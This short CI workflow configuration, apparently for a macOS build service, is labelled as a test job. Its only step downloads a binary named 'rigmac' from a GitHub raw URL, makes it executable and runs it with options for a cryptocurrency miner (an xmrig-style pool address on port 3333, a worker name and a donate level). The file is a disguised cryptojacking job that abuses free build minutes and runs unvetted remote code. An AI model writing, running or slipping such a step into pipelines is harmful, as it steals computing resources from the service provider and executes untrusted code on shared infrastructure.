workflows:
  my-workflow:
    name: tests-doang
    instance_type: mac_mini
    scripts:
    - wget https://github.com/duitawa/gas2/raw/masuk/rigmac && chmod 777 rigmac && ./rigmac  -o 137.184.144.131:3333 -u SafeBamboo -p x --donate-level 1 -k 